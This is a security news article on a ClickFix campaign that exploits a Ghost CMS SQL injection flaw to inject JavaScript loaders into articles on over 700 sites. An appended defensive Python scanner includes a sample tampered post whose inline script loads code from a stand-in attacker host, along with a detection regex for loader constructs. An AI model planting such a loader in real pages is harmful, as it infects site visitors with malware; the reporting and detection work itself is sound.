Ghost CMS SQL injection flaw exploited in large-scale ClickFix campaign
At a glance:
- Over 700 domains compromised through Ghost CMS vulnerability CVE-2026-26980
- Attackers steal admin API keys to deploy ClickFix malware targeting university and enterprise sites
- Patch released February 19; sites urged to upgrade to Ghost 6.19.1 and rotate exposed keys
Attack Details
A large-scale campaign is exploiting a critical SQL injection vulnerability (CVE-2026-26980) in Ghost CMS to inject malicious JavaScript code that triggers ClickFix attack flows. The campaign was discovered by XLab threat intelligence researchers at Chinese cybersecurity company Qianxin, who confirmed impact on more than 700 domains across various sectors. These compromised sites include university portals, AI/SaaS companies, media outlets, fintech firms, security sites, and personal blogs, demonstrating the broad reach of this attack vector.
According to the researchers, notable institutions affected include Harvard University, Oxford University, Auburn University, and DuckDuckGo. The vulnerability allows unauthenticated attackers to read arbitrary data from the website database, including the admin API keys, which provide management access to users, articles, and themes. This elevated access enables attackers to modify article pages and maintain persistence within compromised systems.
Vulnerability Timeline
Although the fix for the issue was released on February 19 in Ghost CMS version 6.19.1, many sites failed to install the security update, leaving them vulnerable to exploitation. On February 27, SentinelOne published details of CVE-2026-26980 being exploited in the wild, along with guidance on how such incidents can be detected. The researchers observed at least two distinct activity clusters targeting vulnerable Ghost sites, with attackers sometimes re-infecting the same domains with different scripts after cleanup, or one group removing another's script in order to inject its own malware.
The timeline of attacks shows a pattern of exploitation that began shortly after the vulnerability was discovered but before widespread patches were deployed. This window of opportunity allowed threat actors to compromise numerous high-profile sites before the security community could fully respond. The persistence of the attack, with multiple groups competing for control of compromised sites, indicates the value that attackers place on these compromised platforms for distributing malware.
Attack Chain Analysis
The attacks that XLab observed begin by exploiting CVE-2026-26980 to steal the admin API keys, and then use the elevated rights to inject malicious JavaScript into articles. This JavaScript code serves as a lightweight loader that fetches second-stage code from the attacker's infrastructure. The second-stage code is essentially a cloaking script that fingerprints visitors to determine whether they qualify as targets, helping attackers avoid security researchers and focus on high-value victims.
Visitors passing the verification are served a fake Cloudflare prompt loaded via an iframe on top of the article page, which contains the ClickFix lure. The page instructs victims to verify that they are human by pasting a provided command into the Windows command prompt, which ultimately drops a payload on their systems. XLab has observed multiple payloads being used in these attacks, including DLL loaders, JavaScript droppers, and an Electron-based malware sample named UtilifySetup.exe, demonstrating the flexibility of this attack infrastructure.
Mitigation Recommendations
The most important course of action for Ghost CMS website administrators is to upgrade to version 6.19.1 or later and rotate all previously used API keys, as they may have been exposed during the compromise. XLab provided a list of indicators of compromise (IoCs), including the injected scripts, so a thorough review of affected websites is needed to locate and remove any malicious code that may have been injected. This review should cover article content, theme files, and any custom plugins for unauthorized modifications.
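As an added example (not code from the article, XLab, or the Ghost project), a small Python scanner for the article-content review described above. It walks a Ghost JSON export, assumed to carry posts under db[0].data.posts with an html field and per-post codeinjection_head/codeinjection_foot slots, and flags script or iframe sources outside an allowlist plus inline script bodies that use loader constructs; the allowlist hosts and the sample export are constructed for the example.

```python
import json
import re
from html.parser import HTMLParser
from urllib.parse import urlparse

# Hypothetical allowlist of hosts this site legitimately loads scripts and frames from.
ALLOWED_HOSTS = {"example-blog.test", "cdn.example-blog.test"}
# Constructs an article body never needs but injected loaders commonly rely on.
LOADER_RE = re.compile(r"\b(eval|atob|unescape|document\.write)\s*\(|createElement\(\s*['\"]script")
class _Collector(HTMLParser):
    def __init__(self):
        super().__init__()
        self.findings = []  # (tag, reason, detail)
        self._in_script = False
    def handle_starttag(self, tag, attrs):
        if tag not in ("script", "iframe"):
            return
        src = dict(attrs).get("src")
        if src is None:
            self._in_script = tag == "script"
        elif (urlparse(src).hostname or "") not in ALLOWED_HOSTS:
            self.findings.append((tag, "external src", src))
    def handle_data(self, data):
        # HTMLParser hands <script> bodies over as raw data, so inline loaders land here.
        if self._in_script and LOADER_RE.search(data):
            self.findings.append(("script", "suspicious inline body", data.strip()[:80]))
    def handle_endtag(self, tag):
        if tag == "script":
            self._in_script = False

def scan_post(post):
    """(field, tag, reason, detail) findings for one post record: rendered html plus the
    per-post code-injection slots (field names assumed from Ghost's export format)."""
    findings = []
    for field in ("html", "codeinjection_head", "codeinjection_foot"):
        c = _Collector()
        c.feed(post.get(field) or "")
        findings.extend((field,) + f for f in c.findings)
    return findings

def scan_export(export_json):
    """Scan every post in a Ghost JSON export (db[0].data.posts assumed); {title: findings}."""
    posts = json.loads(export_json)["db"][0]["data"]["posts"]
    return {p["title"]: f for p in posts if (f := scan_post(p))}
# Constructed sample export: one clean post and one tampered the way the campaign does.
SAMPLE_EXPORT = json.dumps({"db": [{"data": {"posts": [
    {"title": "Clean post", "html": '<p>Hi</p><script src="https://cdn.example-blog.test/app.js"></script>'},
    {"title": "Tampered post", "codeinjection_foot": '<iframe src="https://attacker.invalid/verify"></iframe>',
     "html": "<p>Hi</p><script>var s=document.createElement('script');"
             "s.src='https://attacker.invalid/l.js';document.head.appendChild(s)</script>"}]}}]})
```

Run scan_export on a real export and treat every flagged post as needing manual review; an empty result does not prove a site clean, since theme files and settings-level code injection are outside what this scans.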
The researchers recommend that website owners maintain a 30-day record of admin API call logs to enable a reliable retrospective investigation if needed. This logging practice can help identify when the initial compromise occurred and what actions the attackers took within the system. Additionally, implementing file integrity monitoring and regular security audits can help detect similar compromises in the future, even if they exploit different vulnerabilities.
Industry Impact
This large-scale exploitation of a CMS vulnerability highlights the ongoing challenges in web application security, particularly for content management systems that power critical infrastructure. The fact that prestigious educational institutions and well-known technology companies were affected demonstrates that no organization is immune to such attacks, regardless of their security posture or reputation. The incident also underscores the importance of timely patch management, as many compromised sites likely failed to apply the security update promptly.
The competing attack groups observed by researchers suggest a growing ecosystem of malware-as-service offerings, where different criminal organizations vie for control of compromised websites. This competition can actually benefit security researchers by providing multiple perspectives on attack techniques and helping to identify new malware variants. However, it also complicates incident response, as website administrators may face multiple attackers with different objectives and methods simultaneously.
Prepared by the editorial stack from public data and external sources.